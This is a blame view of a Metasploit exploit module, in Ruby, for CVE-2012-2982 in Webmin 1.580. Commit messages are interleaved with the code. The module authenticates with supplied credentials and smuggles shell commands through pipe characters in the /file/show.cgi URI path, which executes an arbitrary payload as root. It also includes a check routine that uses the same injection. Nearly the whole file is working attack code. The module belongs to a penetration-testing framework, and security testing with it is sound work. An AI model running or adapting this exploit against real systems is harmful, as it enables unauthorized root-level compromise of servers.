adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f8a94de6710abe3042a26a9dca38dcccff2c93be
metasploit-gs/modules/exploits/unix/webapp/webmin_show_cgi_exec.rb
T

156 lines
4.4 KiB
Ruby
Raw Normal View History

Unix linefeeds, not windows
2012-09-16 18:10:35 -05:00
##
Fix up comment splats with the correct URI
2014-10-17 11:47:33 -05:00
# This module requires Metasploit: http://metasploit.com/download
Redo the boilerplate / splat
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
Unix linefeeds, not windows
2012-09-16 18:10:35 -05:00
##
require 'msf/core'
use MetasploitModule as a class name
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
Retab modules
2013-08-30 16:28:54 -05:00
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin /file/show.cgi Remote Command Execution',
'Description' => %q{
This module exploits an arbitrary command execution vulnerability in Webmin
1.580. The vulnerability exists in the /file/show.cgi component and allows an
authenticated user, with access to the File Manager Module, to execute arbitrary
commands with root privileges. The module has been tested successfully with Webim
1.580 over Ubuntu 10.04.
},
'Author' => [
'Unknown', # From American Information Security Group
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
Revert "Land #6812, remove broken OSVDB references"
2016-07-15 12:00:31 -05:00
['OSVDB', '85248'],
Retab modules
2013-08-30 16:28:54 -05:00
['BID', '55446'],
['CVE', '2012-2982'],
['URL', 'http://www.americaninfosec.com/research/dossiers/AISG-12-001.pdf'],
['URL', 'https://github.com/webmin/webmin/commit/1f1411fe7404ec3ac03e803cfa7e01515e71a213']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd',
Fix #5659: Update CMD exploits payload compatibility options
2015-08-10 17:12:59 -05:00
'RequiredCmd' => 'generic perl ruby python telnet',
Retab modules
2013-08-30 16:28:54 -05:00
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Webim 1.580', { }]],
'DisclosureDate' => 'Sep 06 2012',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(10000),
OptBool.new('SSL', [true, 'Use SSL', true]),
OptString.new('USERNAME', [true, 'Webmin Username']),
OptString.new('PASSWORD', [true, 'Webmin Password'])
], self.class)
end
def check
peer = "#{rhost}:#{rport}"
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
vprint_status("Attempting to login...")
Retab modules
2013-08-30 16:28:54 -05:00
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
Resolved some Set-Cookie warnings
2014-05-24 00:34:46 +02:00
if res and res.code == 302 and res.get_cookies =~ /sid/
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
vprint_good "Authentication successful"
Resolved some Set-Cookie warnings
2014-05-24 00:34:46 +02:00
session = res.get_cookies.split("sid=")[1].split(";")[0]
Retab modules
2013-08-30 16:28:54 -05:00
else
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
vprint_error "Service found, but authentication failed"
Saving progress
2014-01-21 11:07:03 -06:00
return Exploit::CheckCode::Detected
Retab modules
2013-08-30 16:28:54 -05:00
end
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
vprint_status("Attempting to execute...")
Retab modules
2013-08-30 16:28:54 -05:00
command = "echo #{rand_text_alphanumeric(rand(5) + 5)}"
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
Saving progress
2014-01-21 11:07:03 -06:00
return Exploit::CheckCode::Vulnerable
Retab modules
2013-08-30 16:28:54 -05:00
else
return Exploit::CheckCode::Safe
end
end
def exploit
peer = "#{rhost}:#{rport}"
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_status("Attempting to login...")
Retab modules
2013-08-30 16:28:54 -05:00
data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}"
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/session_login.cgi",
'cookie' => "testing=1",
'data' => data
}, 25)
Resolved some Set-Cookie warnings
2014-05-24 00:34:46 +02:00
if res and res.code == 302 and res.get_cookies =~ /sid/
session = res.get_cookies.scan(/sid\=(\w+)\;*/).flatten[0] || ''
Retab modules
2013-08-30 16:28:54 -05:00
if session and not session.empty?
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_good "Authentication successfully"
Retab modules
2013-08-30 16:28:54 -05:00
else
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_error "Authentication failed"
Retab modules
2013-08-30 16:28:54 -05:00
return
end
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_good "Authentication successfully"
Retab modules
2013-08-30 16:28:54 -05:00
else
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_error "Authentication failed"
Retab modules
2013-08-30 16:28:54 -05:00
return
end
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_status("Attempting to execute the payload...")
Retab modules
2013-08-30 16:28:54 -05:00
command = payload.encoded
res = send_request_cgi(
{
'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|",
'cookie' => "sid=#{session}"
}, 25)
if res and res.code == 200 and res.message =~ /Document follows/
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_good "Payload executed successfully"
Retab modules
2013-08-30 16:28:54 -05:00
else
Remove now-redundant peer
2016-02-01 15:12:03 -06:00
print_error "Error executing the payload"
Retab modules
2013-08-30 16:28:54 -05:00
return
end
Unix linefeeds, not windows
2012-09-16 18:10:35 -05:00
Retab modules
2013-08-30 16:28:54 -05:00
end
Unix linefeeds, not windows
2012-09-16 18:10:35 -05:00
end
Reference in New Issue Copy Permalink